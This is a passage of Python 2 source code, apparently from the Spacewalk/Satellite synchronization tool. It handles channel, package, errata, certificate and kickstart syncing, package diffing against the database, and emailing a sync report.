_verifyPkgRepMountPoint() if OPTIONS.email: initEMAIL_LOG() # init the synchronization processor self.syncer = Syncer(channels, actionDict['list-channels'], actionDict['rpms'], forceAllErrata=actionDict['force-all-errata']) try: self.syncer.initialize() except (KeyboardInterrupt, SystemExit): raise except xmlWireSource.rpclib.xmlrpclib.Fault, e: if CFG.ISS_PARENT: if CFG.PRODUCT_NAME == 'Spacewalk': log(-1, ['', messages.sw_iss_not_available % e.faultString], ) else: log(-1, ['', messages.sat_iss_not_available % e.faultString], ) sys.exit(26) else: log(-1, ['', messages.syncer_error % e.faultString], ) sys.exit(9) except Exception, e: # pylint: disable=E0012, W0703 log(-1, ['', messages.syncer_error % e], ) sys.exit(10) log(1, ' db: %s/<password>@%s' % (CFG.DB_USER, CFG.DB_NAME)) selected = [action for action in actionDict.keys() if actionDict[action]] log2(-1, 3, "Action list/commandline toggles: %s" % repr(selected), stream=sys.stderr) if OPTIONS.mount_point: self._xml_file_dir_error_message = messages.file_dir_error % \ OPTIONS.mount_point for _try in range(2): try: for step in self.step_hierarchy: if not actionDict[step]: continue method_name = '_step_' + step.replace('-', '_') if not hasattr(self, method_name): log(-1, _("No handler for step %s") % step) continue method = getattr(self, method_name) ret = method() if ret: sys.exit(ret) else: # for # Everything went fine break except ReprocessingNeeded: # Try one more time - this time it should be faster since # everything should be cached log(1, _('Environment changed, trying again...')) continue except RhnSyncException: rhnSQL.rollback() raise else: log(1, _('Repeated failures')) timeEnd = time.time() delta_str = self._get_elapsed_time(timeEnd - timeStart) log(1, _("""\ Import complete: Begin time: %s End time: %s Elapsed: %s """) % (formatDateTime(dt=time.localtime(timeStart)), formatDateTime(dt=time.localtime(timeEnd)), delta_str), cleanYN=1) # mail out that log if appropriate sendMail() return 0 @staticmethod def _get_elapsed_time(elapsed): elapsed = int(elapsed) hours = elapsed / 60 / 60 mins = elapsed / 60 - hours * 60 secs = elapsed - mins * 60 - hours * 60 * 60 delta_list = [[hours, _("hours")], [mins, _("minutes")], [secs, _("seconds")]] delta_str = ", ".join(["%s %s" % (l[0], l[1]) for l in delta_list]) return delta_str def _run_syncer_step(self, function, step_name): """ Runs a function, and catches the most common error cases """ try: ret = function() except (xmlDiskSource.MissingXmlDiskSourceDirError, xmlDiskSource.MissingXmlDiskSourceFileError), e: log(-1, self._xml_file_dir_error_message + '\n Error message: %s\n' % e) return 1 except (KeyboardInterrupt, SystemExit): raise except xmlWireSource.rpclib.xmlrpclib.Fault, e: log(-1, messages.failed_step % (step_name, e.faultString)) return 1 except Exception, e: # pylint: disable=E0012, W0703 log(-1, messages.failed_step % (step_name, e)) return 1 return ret def _step_arches(self): self.syncer.processArches() def _step_channel_families(self): self.syncer.processChannelFamilies() # Sync the certificate (and update channel family permissions) if not CFG.ISS_PARENT: self.syncer.syncCert() def _step_channels(self): try: self.syncer.process_channels() except MissingParentChannelError, e: msg = messages.parent_channel_error % repr(e.channel) log(-1, msg) # log2email(-1, msg) # redundant sendMail() return 1 def _step_short(self): try: return self.syncer.processShortPackages() except xmlDiskSource.MissingXmlDiskSourceFileError: msg = _("ERROR: The dump is missing package data, " + 
"use --no-rpms to skip this step or fix the content to include package data.") log2disk(-1, msg) log2stderr(-1, msg, cleanYN=1) sys.exit(25) def _step_download_packages(self): return self.syncer.download_package_metadata() def _step_download_source_packages(self): return self.syncer.download_source_package_metadata() def _step_rpms(self): self._packages_report = self.syncer.download_rpms() return None # def _step_srpms(self): # return self.syncer.download_srpms() def _step_download_errata(self): return self.syncer.download_errata() def _step_download_kickstarts(self): return self.syncer.download_kickstarts() def _step_packages(self): self._affected_channels = self.syncer.import_packages() # def _step_source_packages(self): # self.syncer.import_packages(sources=1) def _step_errata(self): self.syncer.import_errata() # Now that errata have been populated, schedule an errata cache # refresh schedule_errata_cache_update(self._affected_channels) def _step_kickstarts(self): self.syncer.import_kickstarts() def _step_orgs(self): try: self.syncer.import_orgs() except (RhnSyncException, xmlDiskSource.MissingXmlDiskSourceFileError, xmlDiskSource.MissingXmlDiskSourceDirError): # the orgs() method doesn't exist; that's fine we just # won't sync the orgs log(1, [_("The upstream Satellite does not support syncing orgs data."), _("Skipping...")]) def sendMail(forceEmail=0): """ Send email summary """ if forceEmail or (OPTIONS is not None and OPTIONS.email): body = dumpEMAIL_LOG() if body: print _("+++ sending log as an email +++") headers = { 'Subject': _('RHN Management Satellite sync. report from %s') % idn_pune_to_unicode(os.uname()[1]), } sndr = "root@%s" % idn_pune_to_unicode(os.uname()[1]) rhnMail.send(headers, body, sender=sndr) else: print _("+++ email requested, but there is nothing to send +++") # mail was sent. Let's not allow it to be sent twice... OPTIONS.email = None class Syncer: """ high-level sychronization/import class NOTE: there should *ONLY* be one instance of this. """ def __init__(self, channels, listChannelsYN, check_rpms, forceAllErrata=False): """ Base initialization. Most work done in self.initialize() which needs to be called soon after instantiation. 
""" self._requested_channels = channels self.mountpoint = OPTIONS.mount_point self.rhn_cert = OPTIONS.rhn_cert self.listChannelsYN = listChannelsYN self.forceAllErrata = forceAllErrata self.sslYN = not OPTIONS.no_ssl self._systemidPath = OPTIONS.systemid or _DEFAULT_SYSTEMID_PATH self._batch_size = OPTIONS.batch_size self.master_label = OPTIONS.master #self.create_orgs = OPTIONS.create_missing_orgs self.xml_dump_version = OPTIONS.dump_version or str(constants.PROTOCOL_VERSION) self.check_rpms = check_rpms self.keep_rpms = OPTIONS.keep_rpms # Object to help with channel math self._channel_req = None self._channel_collection = sync_handlers.ChannelCollection() self.containerHandler = sync_handlers.ContainerHandler( self.master_label) # instantiated in self.initialize() self.xmlDataServer = None self.systemid = None # self._*_full hold list of all ids for appropriate channel while # non-full self._* contain every id only once (in first channel it appeared) self._channel_packages = {} self._channel_packages_full = {} self._avail_channel_packages = {} self._missing_channel_packages = None self._missing_fs_packages = None self._failed_fs_packages = Queue.Queue() self._extinct_packages = Queue.Queue() self._channel_errata = {} self._missing_channel_errata = {} self._channel_source_packages = {} self._channel_source_packages_full = {} self._channel_kickstarts = {} self._avail_channel_source_packages = None self._missing_channel_src_packages = None self._missing_fs_source_packages = None def initialize(self): """Initialization that requires IO, etc.""" # Sync from filesystem: if self.mountpoint: log(1, [_(PRODUCT_NAME + ' - file-system synchronization'), ' mp: %s' % self.mountpoint]) self.xmlDataServer = xmlDiskSource.MetadataDiskSource(self.mountpoint) # Sync across the wire: else: self.xmlDataServer = xmlWireSource.MetadataWireSource(self.systemid, self.sslYN, self.xml_dump_version) if CFG.ISS_PARENT: sync_parent = CFG.ISS_PARENT self.systemid = 'N/A' # systemid is not used in ISS auth process is_iss = 1 elif not CFG.DISCONNECTED: sync_parent = CFG.RHN_PARENT is_iss = 0 else: log(1, _(PRODUCT_NAME + ' - live synchronization')) log(-1, _("ERROR: Can't use live synchronization in disconnected mode."), stream=sys.stderr) sys.exit(1) url = self.xmlDataServer.schemeAndUrl(sync_parent) log(1, [_(PRODUCT_NAME + ' - live synchronization'), _(' url: %s') % url, _(' debug/output level: %s') % CFG.DEBUG]) self.xmlDataServer.setServerHandler(isIss=is_iss) if not self.systemid: # check and fetch systemid (NOTE: systemid kept in memory... may or may not # be better to do it this way). if (os.path.exists(self._systemidPath) and os.access(self._systemidPath, os.R_OK)): self.systemid = open(self._systemidPath, 'rb').read() else: raise RhnSyncException, _('ERROR: this server must be registered with RHN.'), sys.exc_info()[2] # authorization check of the satellite auth = xmlWireSource.AuthWireSource(self.systemid, self.sslYN, self.xml_dump_version) auth.checkAuth() def __del__(self): self.containerHandler.close() def _process_simple(self, remote_function_name, step_name): """ Wrapper function that can process metadata that is relatively simple. This does the decoding of data (over the wire or from disk). step_name is just for pretty printing the actual --step name to the console. 
The remote function is passed by name (as a string), to mimic the lazy behaviour of the if block """ log(1, ["", _("Retrieving / parsing %s data") % step_name]) # get XML stream stream = None method = getattr(self.xmlDataServer, remote_function_name) stream = method() # parse/process XML stream try: self.containerHandler.process(stream) except KeyboardInterrupt: log(-1, _('*** SYSTEM INTERRUPT CALLED ***'), stream=sys.stderr) raise except (FatalParseException, ParseException, Exception), e: # pylint: disable=E0012, W0703 # nuke the container batch upon error! self.containerHandler.clear() msg = '' if isinstance(e, FatalParseException): msg = (_('ERROR: fatal parser exception occurred ') + _('(line: %s, col: %s msg: %s)') % ( e.getLineNumber(), e.getColumnNumber(), e._msg)) elif isinstance(e, ParseException): msg = (_('ERROR: parser exception occurred: %s') % (e)) elif isinstance(e, exceptions.SystemExit): log(-1, _('*** SYSTEM INTERRUPT CALLED ***'), stream=sys.stderr) raise else: msg = _('ERROR: exception (during parse) occurred: ') log2stderr(-1, _(' Encountered some errors with %s data ' + '(see logs (%s) for more information)') % (step_name, CFG.LOG_FILE)) log2(-1, 3, [_(' Encountered some errors with %s data:') % step_name, _(' ------- %s PARSE/IMPORT ERROR -------') % step_name, ' %s' % msg, _(' ---------------------------------------')], stream=sys.stderr) exitWithTraceback(e, '', 11) self.containerHandler.reset() log(1, _("%s data complete") % step_name) def processArches(self): self._process_simple("getArchesXmlStream", "arches") self._process_simple("getArchesExtraXmlStream", "additional arches") def import_orgs(self): self._process_simple("getOrgsXmlStream", "orgs") def syncCert(self): "sync the Red Hat Satellite cert if applicable (to local DB & filesystem)" store_cert = True if self.mountpoint: if self.rhn_cert: # Certificate was presented on the command line try: cert = open(self.rhn_cert).read() except IOError, e: raise RhnSyncException(_("Unable to open file %s: %s") % ( self.rhn_cert, e)), None, sys.exc_info()[2] cert = cert.strip() else: # Try to retrieve the certificate from the database row = satCerts.retrieve_db_cert() if row is None: raise RhnSyncException(_("No certificate found. " "Please use --rhn-cert")) cert = row['cert'] store_cert = False else: log2(1, 3, ["", _("RHN Entitlement Certificate sync")]) certSource = xmlWireSource.CertWireSource(self.systemid, self.sslYN, self.xml_dump_version) cert = certSource.download().strip() return self._process_cert(cert, store_cert) @staticmethod def _process_cert(cert, store_cert=1): """Give the cert a check - if it's broken xml we'd better find it out now """ log2(1, 4, _(" - parsing for sanity")) sat_cert = satellite_cert.SatelliteCert() try: sat_cert.load(cert) except satellite_cert.ParseException: # XXX figure out what to do raise RhnSyncException(_("Error parsing the satellite cert")), None, sys.exc_info()[2] # pylint: disable=E1101 # Compare certificate generation - should match the stream's generation = rhnFlags.get('stream-generation') if sat_cert.generation != generation: raise RhnSyncException(_("""\ Unable to import certificate: channel dump generation %s incompatible with cert generation %s. 
Please contact your RHN representative""") % (generation, sat_cert.generation)) satCerts.set_slots_from_cert(sat_cert, testonly=True) # push it into the database log2(1, 4, _(" - syncing to local database")) # possible place for bug 146395 # Populate channel family permissions sync_handlers.populate_channel_family_permissions(sat_cert) # Get rid of the extra channel families sync_handlers.purge_extra_channel_families() if store_cert: # store it! (does a commit) # XXX bug 146395 satCerts.storeRhnCert(cert) # Fix the channel family counts now sync_handlers.update_channel_family_counts() if store_cert: # save it to disk log2(1, 4, _(" - syncing to disk %s") % _DEFAULT_RHN_ENTITLEMENT_CERT_BACKUP) fileutils.rotateFile(_DEFAULT_RHN_ENTITLEMENT_CERT_BACKUP, depth=5) open(_DEFAULT_RHN_ENTITLEMENT_CERT_BACKUP, 'wb').write(cert) log2(1, 3, _("RHN Entitlement Certificate sync complete")) def processChannelFamilies(self): self._process_simple("getChannelFamilyXmlStream", "channel-families") # pylint: disable=W0703 try: self._process_simple("getProductNamesXmlStream", "product names") except Exception: pass def _process_comps(self, backend, label, timestamp): comps_path = 'rhn/comps/%s/comps-%s.xml' % (label, timestamp) full_path = os.path.join(CFG.MOUNT_POINT, comps_path) if not os.path.exists(full_path): if self.mountpoint or CFG.ISS_PARENT: stream = self.xmlDataServer.getComps(label) else: rpmServer = xmlWireSource.RPCGetWireSource(self.systemid, self.sslYN, self.xml_dump_version) stream = rpmServer.getCompsFileStream(label) f = FileManip(comps_path, timestamp, None) f.write_file(stream) data = {label: None} backend.lookupChannels(data) rhnSQL.Procedure('rhn_channel.set_comps')(data[label]['id'], comps_path, timestamp) def process_channels(self): """ push channels, channel-family and dist. map information as well upon parsing. """ log(1, ["", _("Retrieving / parsing channel data")]) h = sync_handlers.get_channel_handler() # get channel XML stream stream = self.xmlDataServer.getChannelXmlStream() if self.mountpoint: for substream in stream: h.process(substream) doEOSYN = 0 else: h.process(stream) doEOSYN = 1 h.close() # clean up the channel request and populate self._channel_request # This essentially determines which channels are to be imported self._compute_channel_request() # print out the relevant channel tree # 3/6/06 wregglej 183213 Don't print out the end-of-service message if # satellite-sync is running with the --mount-point (-m) option. If it # did, it would incorrectly list channels as end-of-service if they had been # synced already but aren't in the channel dump. 
self._printChannelTree(doEOSYN=doEOSYN) if self.listChannelsYN: # We're done here return requested_channels = self._channel_req.get_requested_channels() try: importer = sync_handlers.import_channels(requested_channels, orgid=OPTIONS.orgid or None, master=OPTIONS.master or None) for label in requested_channels: timestamp = self._channel_collection.get_channel_timestamp(label) ch = self._channel_collection.get_channel(label, timestamp) if ch.has_key('comps_last_modified') and ch['comps_last_modified'] is not None: self._process_comps(importer.backend, label, sync_handlers._to_timestamp(ch['comps_last_modified'])) except InvalidChannelFamilyError: raise RhnSyncException(messages.invalid_channel_family_error % ''.join(requested_channels)), None, sys.exc_info()[2] except MissingParentChannelError: raise rhnSQL.commit() log(1, _("Channel data complete")) @staticmethod def _formatChannelExportType(channel): """returns pretty formated text with type of channel export""" if 'export-type' not in channel or channel['export-type'] is None: return '' else: export_type = channel['export-type'] if 'export-start-date' in channel and channel['export-start-date'] is not None: start_date = channel['export-start-date'] else: start_date = '' if 'export-end-date' in channel and channel['export-end-date'] is not None: end_date = channel['export-end-date'] else: end_date = '' if end_date and not start_date: return _("%10s import from %s") % (export_type, formatDateTime(end_date)) elif end_date and start_date: return _("%10s import from %s - %s") % (export_type, formatDateTime(start_date), formatDateTime(end_date)) else: return _("%10s") % export_type def _printChannel(self, label, channel_object, log_format, is_imported): assert channel_object is not None all_pkgs = channel_object['all-packages'] or channel_object['packages'] pkgs_count = len(all_pkgs) if is_imported: status = _('p') else: status = _('.') log(1, log_format % (status, label, pkgs_count, self._formatChannelExportType(channel_object))) def _printChannelTree(self, doEOSYN=1, doTyposYN=1): "pretty prints a tree of channel information" log(1, _(' p = previously imported/synced channel')) log(1, _(' . = channel not yet imported/synced')) ch_end_of_service = self._channel_req.get_end_of_service() ch_typos = self._channel_req.get_typos() ch_requested_imported = self._channel_req.get_requested_imported() relevant = self._channel_req.get_requested_channels() if doEOSYN and ch_end_of_service: log(1, _(' e = channel no longer supported (end-of-service)')) if doTyposYN and ch_typos: log(1, _(' ? 
= channel label invalid --- typo?')) pc_labels = sorted(self._channel_collection.get_parent_channel_labels()) t_format = _(' %s:') p_format = _(' %s %-40s %4s %s') log(1, t_format % _('base-channels')) # Relevant parent channels no_base_channel = True for plabel in pc_labels: if plabel not in relevant: continue no_base_channel = False timestamp = self._channel_collection.get_channel_timestamp(plabel) channel_object = self._channel_collection.get_channel(plabel, timestamp) self._printChannel(plabel, channel_object, p_format, (plabel in ch_requested_imported)) if no_base_channel: log(1, p_format % (' ', _('NONE RELEVANT'), '', '')) # Relevant parent channels for plabel in pc_labels: cchannels = self._channel_collection.get_child_channels(plabel) # chns has only the channels we are interested in # (and that's all the channels if we list them) chns = [] for clabel, ctimestamp in cchannels: if clabel in relevant: chns.append((clabel, ctimestamp)) if not chns: # No child channels, skip continue log(1, t_format % plabel) for clabel, ctimestamp in sorted(chns): channel_object = self._channel_collection.get_channel(clabel, ctimestamp) self._printChannel(clabel, channel_object, p_format, (clabel in ch_requested_imported)) log(2, '') if doEOSYN and ch_end_of_service: log(1, t_format % _('end-of-service')) status = _('e') for chn in ch_end_of_service: log(1, p_format % (status, chn, '', '')) log(2, '') if doTyposYN and ch_typos: log(1, _(' typos:')) status = _('?') for chn in ch_typos: log(1, p_format % (status, chn, '', '')) log(2, '') log(1, '') def _compute_channel_request(self): """ channels request is verify and categorized. NOTE: self.channel_req *will be* initialized by this method """ # channels already imported, and all channels importedChannels = _getImportedChannels() availableChannels = self._channel_collection.get_channel_labels() log(6, _('XXX: imported channels: %s') % importedChannels, 1) log(6, _('XXX: cached channels: %s') % availableChannels, 1) # if requested a channel list, we are requesting all channels if self.listChannelsYN: requested_channels = availableChannels log(6, _('XXX: list channels called'), 1) else: requested_channels = self._requested_channels rc = req_channels.RequestedChannels(requested_channels) rc.set_available(availableChannels) rc.set_imported(importedChannels) # rc does all the logic of doing intersections and stuff rc.compute() typos = rc.get_typos() if typos: log(-1, _("ERROR: these channels either do not exist or " "are not available:")) for chn in typos: log(-1, " %s" % chn) log(-1, _(" (to see a list of channel labels: %s --list-channels)") % sys.argv[0]) sys.exit(12) self._channel_req = rc return rc def _get_channel_timestamp(self, channel): try: timestamp = self._channel_collection.get_channel_timestamp(channel) except KeyError: # XXX Do something with this exception raise return timestamp def _compute_unique_packages(self): """ process package metadata for one channel at a time """ relevant = sorted(self._channel_req.get_requested_channels()) self._channel_packages = {} self._channel_packages_full = {} self._avail_channel_packages = {} already_seen_ids = set() for chn in relevant: timestamp = self._get_channel_timestamp(chn) channel_obj = self._channel_collection.get_channel(chn, timestamp) avail_package_ids = sorted(set(channel_obj['packages'] or [])) package_full_ids = sorted(set(channel_obj['all-packages'] or [])) or avail_package_ids package_ids = sorted(set(package_full_ids) - already_seen_ids) self._channel_packages[chn] = package_ids 
self._channel_packages_full[chn] = package_full_ids self._avail_channel_packages[chn] = avail_package_ids already_seen_ids.update(package_ids) def processShortPackages(self): log(1, ["", "Retrieving short package metadata (used for indexing)"]) # Compute the unique packages and populate self._channel_packages self._compute_unique_packages() stream_loader = StreamProducer( sync_handlers.get_short_package_handler(), self.xmlDataServer, 'getChannelShortPackagesXmlStream') sorted_channels = sorted(self._channel_packages.items(), key=lambda x: x[0]) # sort by channel_label for channel_label, package_ids in sorted_channels: log(1, _(" Retrieving / parsing short package metadata: %s (%s)") % (channel_label, len(package_ids))) if package_ids: lm = self._channel_collection.get_channel_timestamp(channel_label) channel_last_modified = int(rhnLib.timestamp(lm)) stream_loader.set_args(channel_label, channel_last_modified) stream_loader.process(package_ids) stream_loader.close() self._diff_packages() _query_compare_packages = """ select p.id, c.checksum_type, c.checksum, p.path, p.package_size, TO_CHAR(p.last_modified, 'YYYYMMDDHH24MISS') last_modified from rhnPackage p, rhnChecksumView c where p.name_id = lookup_package_name(:name) and p.evr_id = lookup_evr(:epoch, :version, :release) and p.package_arch_id = lookup_package_arch(:arch) and (p.org_id = :org_id or (p.org_id is null and :org_id is null)) and p.checksum_id = c.id """ def _diff_packages_process(self, chunk, channel_label): package_collection = sync_handlers.ShortPackageCollection() h = rhnSQL.prepare(self._query_compare_packages) for pid in chunk: package = package_collection.get_package(pid) assert package is not None l_timestamp = rhnLib.timestamp(package['last_modified']) if package['org_id'] is not None: package['org_id'] = OPTIONS.orgid or DEFAULT_ORG nevra = get_nevra_dict(package) nevra['org_id'] = package['org_id'] h.execute(**nevra) row = None for r in (h.fetchall_dict() or []): # let's check which checksum we have in database if (r['checksum_type'] in package['checksums'] and package['checksums'][r['checksum_type']] == r['checksum']): row = r break self._process_package(pid, package, l_timestamp, row, self._missing_channel_packages[channel_label], self._missing_fs_packages[channel_label], check_rpms=self.check_rpms) # XXX the "is null" condition will have to change in multiorg satellites def _diff_packages(self): self._missing_channel_packages = {} self._missing_fs_packages = {} sorted_channels = sorted(self._channel_packages.items(), key=lambda x: x[0]) # sort by channel_label for channel_label, upids in sorted_channels: log(1, _("Diffing package metadata (what's missing locally?): %s") % channel_label) self._missing_channel_packages[channel_label] = [] self._missing_fs_packages[channel_label] = [] self._proces_batch(channel_label, upids[:], None, self._diff_packages_process, _('Diffing: '), [channel_label]) self._verify_missing_channel_packages(self._missing_channel_packages) def _verify_missing_channel_packages(self, missing_channel_packages, sources=0): """Verify if all the missing packages are actually available somehow. 
In an incremental approach, one may request packages that are actually not available in the current dump, probably because of applying an incremental to the wrong base""" for channel_label, pids in missing_channel_packages.items(): if sources: avail_pids = [x[0] for x in self._avail_channel_source_packages[channel_label]] else: avail_pids = self._avail_channel_packages[channel_label] if set(pids or []) > set(avail_pids or []): raise RhnSyncException, _('ERROR: incremental dump skipped') @staticmethod def _get_rel_package_path(nevra, org_id, source, checksum_type, checksum): return get_package_path(nevra, org_id, prepend=CFG.PREPENDED_DIR, source=source, checksum_type=checksum_type, checksum=checksum) @staticmethod def _verify_file(path, mtime, size, checksum_type, checksum): """ Verifies if the file is on the filesystem and matches the mtime and checksum. Computing the checksum is costly, that's why we rely on mtime comparisons. Returns errcode: 0 - file is ok, it has either the specified mtime and size or checksum matches (then function sets mtime) 1 - file does not exist at all 2 - file has a different checksum """ if not path: return 1 abs_path = os.path.join(CFG.MOUNT_POINT, path) try: stat_info = os.stat(abs_path) except OSError: # File is missing completely return 1 l_mtime = stat_info[stat.ST_MTIME] l_size = stat_info[stat.ST_SIZE] if l_mtime == mtime and l_size == size: # Same mtime, and size, assume identity return 0 # Have to check checksum l_checksum = getFileChecksum(checksum_type, filename=abs_path) if l_checksum != checksum: return 2 # Set the mtime os.utime(abs_path, (mtime, mtime)) return 0 def _process_package(self, package_id, package, l_timestamp, row, m_channel_packages, m_fs_packages, check_rpms=1): path = None channel_package = None fs_package = None if row: # package found in the DB checksum_type = row['checksum_type'] if checksum_type in package['checksums']: checksum = package['checksums'][row['checksum_type']] package_size = package['package_size'] db_timestamp = int(rhnLib.timestamp(row['last_modified'])) db_checksum = row['checksum'] db_package_size = row['package_size'] db_path = row['path'] if not (l_timestamp <= db_timestamp and checksum == db_checksum and package_size == db_package_size): # package doesn't match channel_package = package_id if check_rpms: if db_path: # check the filesystem errcode = self._verify_file(db_path, l_timestamp, package_size, checksum_type, checksum) if errcode: # file doesn't match fs_package = package_id channel_package = package_id path = db_path else: # upload package and reimport metadata channel_package = package_id fs_package = package_id else: # package is missing from the DB channel_package = package_id fs_package = package_id if channel_package: m_channel_packages.append(channel_package) if fs_package: m_fs_packages.append((fs_package, path)) return def download_rpms(self): log(1, ["", _("Downloading rpm packages")]) # Lets go fetch the packages and push them to their proper location: sorted_channels = sorted(self._missing_fs_packages.items(), key=lambda x: x[0]) # sort by channel for channel, missing_fs_packages in sorted_channels: missing_packages_count = len(missing_fs_packages) log(1, _(" Fetching any missing RPMs: %s (%s)") % (channel, missing_packages_count or _('NONE MISSING'))) if missing_packages_count == 0: continue # Fetch all RPMs whose meta-data is marked for need to be imported # (ie. 
high chance of not being there) self._fetch_packages(channel, missing_fs_packages) continue log(1, _("Processing rpm packages complete")) def _missing_not_cached_packages(self): missing_packages = {} # First, determine what has to be downloaded short_package_collection = sync_handlers.ShortPackageCollection() package_collection = sync_handlers.PackageCollection() for channel, pids in self._missing_channel_packages.items(): missing_packages[channel] = mp = [] if not pids: # Nothing to see here continue for pid in pids: # XXX Catch errors if (not package_collection.has_package(pid) or package_collection.get_package(pid)['last_modified'] != short_package_collection.get_package(pid)['last_modified']): # not in the cache mp.append(pid) return missing_packages def download_package_metadata(self): log(1, ["", _("Downloading package metadata")]) # Get the missing but uncached packages missing_packages = self._missing_not_cached_packages() stream_loader = StreamProducer( sync_handlers.get_package_handler(), self.xmlDataServer, 'getPackageXmlStream') sorted_channels = sorted(missing_packages.items(), key=lambda x: x[0]) # sort by channel for channel, pids in sorted_channels: self._proces_batch(channel, pids[:], messages.package_parsing, stream_loader.process, is_slow=True) stream_loader.close() # Double-check that we got all the packages missing_packages = self._missing_not_cached_packages() for channel, pids in missing_packages.items(): if pids: # Something may have changed from the moment we started to # download the packages till now raise ReprocessingNeeded def download_srpms(self): self._compute_unique_source_packages() self._diff_source_packages() log(1, ["", _("Downloading srpm packages")]) # Lets go fetch the source packages and push them to their proper location: sorted_channels = sorted(self._missing_fs_source_packages.items(), key=lambda x: x[0]) # sort by channel_label for channel, missing_fs_source_packages in sorted_channels: missing_source_packages_count = len(missing_fs_source_packages) log(1, _(" Fetching any missing SRPMs: %s (%s)") % (channel, missing_source_packages_count or _('NONE MISSING'))) if missing_source_packages_count == 0: continue # Fetch all SRPMs whose meta-data is marked for need to be imported # (ie. 
high chance of not being there) self._fetch_packages(channel, missing_fs_source_packages, sources=1) continue log(1, "Processing srpm packages complete") def _compute_unique_source_packages(self): """ process package metadata for one channel at a time""" relevant = self._channel_req.get_requested_channels() self._channel_source_packages = {} self._channel_source_packages_full = {} self._avail_channel_source_packages = {} already_seen_ids = set() for chn in relevant: timestamp = self._get_channel_timestamp(chn) channel_obj = self._channel_collection.get_channel(chn, timestamp) sps = set(channel_obj['source_packages']) if not sps: # No source package info continue ret_sps = [] for sp in sps: if isinstance(sp, types.StringType): # Old style ret_sps.append((sp, None)) else: ret_sps.append((sp['id'], sp['last_modified'])) del sps ret_sps.sort() self._channel_source_packages[chn] = sorted(set(ret_sps) - already_seen_ids) self._channel_source_packages_full[chn] = ret_sps self._avail_channel_source_packages[chn] = ret_sps already_seen_ids.update(ret_sps) def _compute_not_cached_source_packages(self): missing_sps = {} # First, determine what has to be downloaded sp_collection = sync_handlers.SourcePackageCollection() for channel, sps in self._channel_source_packages.items(): missing_sps[channel] = [] if not sps: # Nothing to see here continue missing_sps[channel] = [sp_id for (sp_id, _timestamp) in sps if not sp_collection.has_package(sp_id)] return missing_sps _query_compare_source_packages = """ select ps.id, c.checksum_type, c.checksum, ps.path, ps.package_size, TO_CHAR(ps.last_modified, 'YYYYMMDDHH24MISS') last_modified from rhnPackageSource ps, rhnChecksumView c where ps.source_rpm_id = lookup_source_name(:package_id) and (ps.org_id = :org_id or (ps.org_id is null and :org_id is null)) and ps.checksum_id = c.id and c.checksum = :checksum and c.checksum_type = :checksum_type """ def _diff_source_packages_process(self, chunk, channel_label): package_collection = sync_handlers.SourcePackageCollection() sql_params = ['package_id', 'checksum', 'checksum_type'] h = rhnSQL.prepare(self._query_compare_source_packages) for pid, _timestamp in chunk: package = package_collection.get_package(pid) assert package is not None params = {} for t in sql_params: params[t] = package[t] or "" if package['org_id'] is not None: params['org_id'] = OPTIONS.orgid or DEFAULT_ORG package['org_id'] = OPTIONS.orgid or DEFAULT_ORG else: params['org_id'] = package['org_id'] h.execute(**params) row = h.fetchone_dict() self._process_package(pid, package, None, row, self._missing_channel_src_packages[channel_label], self._missing_fs_source_packages[channel_label]) # XXX the "is null" condition will have to change in multiorg satellites def _diff_source_packages(self): self._missing_channel_src_packages = {} self._missing_fs_source_packages = {} for channel_label, upids in self._channel_source_packages.items(): log(1, _("Diffing source package metadata (what's missing locally?): %s") % channel_label) self._missing_channel_src_packages[channel_label] = [] self._missing_fs_source_packages[channel_label] = [] self._proces_batch(channel_label, upids[:], None, self._diff_source_packages_process, _('Diffing: '), [channel_label]) self._verify_missing_channel_packages(self._missing_channel_src_packages, sources=1) def download_source_package_metadata(self): log(1, ["", _("Downloading source package metadata")]) # Get the missing but uncached packages missing_packages = self._compute_not_cached_source_packages() stream_loader = 
StreamProducer( sync_handlers.get_source_package_handler(), self.xmlDataServer, 'getSourcePackageXmlStream') for channel, pids in missing_packages.items(): self._proces_batch(channel, pids[:], messages.package_parsing, stream_loader.process, is_slow=True) stream_loader.close() # Double-check that we got all the packages missing_packages = self._compute_not_cached_source_packages() for channel, pids in missing_packages.items(): if pids: # Something may have changed from the moment we started to # download the packages till now raise ReprocessingNeeded def _compute_unique_kickstarts(self): """ process package metadata for one channel at a time""" relevant = self._channel_req.get_requested_channels() self._channel_kickstarts = {} already_seen_kickstarts = set() for chn in relevant: timestamp = self._get_channel_timestamp(chn) channel_obj = self._channel_collection.get_channel(chn, timestamp) self._channel_kickstarts[chn] = \ sorted(set(channel_obj['kickstartable_trees']) - already_seen_kickstarts) already_seen_kickstarts.update(self._channel_kickstarts[chn]) def _compute_missing_kickstarts(self): """ process package metadata for one channel at a time""" relevant = self._channel_req.get_requested_channels() coll = sync_handlers.KickstartableTreesCollection() missing_kickstarts = {} for chn in relevant: timestamp = self._get_channel_timestamp(chn) channel_obj = self._channel_collection.get_channel(chn, timestamp) kickstart_trees = channel_obj['kickstartable_trees'] for ktid in kickstart_trees: # No timestamp for kickstartable trees kt = coll.get_item(ktid, timestamp=None) assert kt is not None kt_label = kt['label'] # XXX rhnKickstartableTree does not have a last_modified # Once we add it, we should be able to do more meaningful # diffs missing_kickstarts[kt_label] = None ret = missing_kickstarts.items() ret.sort() return ret def _download_kickstarts_file(self, chunk, channel_label): cfg = config.initUp2dateConfig() assert len(chunk) == 1 item = chunk[0] label, base_path, relative_path, timestamp, file_size = item path = os.path.join(base_path, relative_path) f = FileManip(path, timestamp=timestamp, file_size=file_size) # Retry a number of times, we may have network errors for _try in range(cfg['networkRetries']): stream = self._get_ks_file_stream(channel_label, label, relative_path) try: f.write_file(stream) break # inner for except FileCreationError, e: msg = e.args[0] log2disk(-1, _("Unable to save file %s: %s") % (path, msg)) # Try again continue else: # for # Retried a number of times and it still failed; log the # file as being failed and move on log2disk(-1, _("Failed to fetch file %s") % path) def download_kickstarts(self): """Downloads all the kickstart-related information""" log(1, ["", _("Downloading kickstartable trees metadata")]) self._compute_unique_kickstarts() stream_loader = StreamProducer( sync_handlers.get_kickstarts_handler(), self.xmlDataServer, 'getKickstartsXmlStream') for channel, ktids in self._channel_kickstarts.items(): self._proces_batch(channel, ktids[:], messages.kickstart_parsing, stream_loader.process) stream_loader.close() missing_ks_files = self._compute_missing_ks_files() log(1, ["", _("Downloading kickstartable trees files")]) sorted_channels = sorted(missing_ks_files.items(), key=lambda x: x[0]) # sort by channel for channel, files in sorted_channels: self._proces_batch(channel, files[:], messages.kickstart_downloading, self._download_kickstarts_file, nevermorethan=1, process_function_args=[channel]) def _get_ks_file_stream(self, channel, kstree_label, 
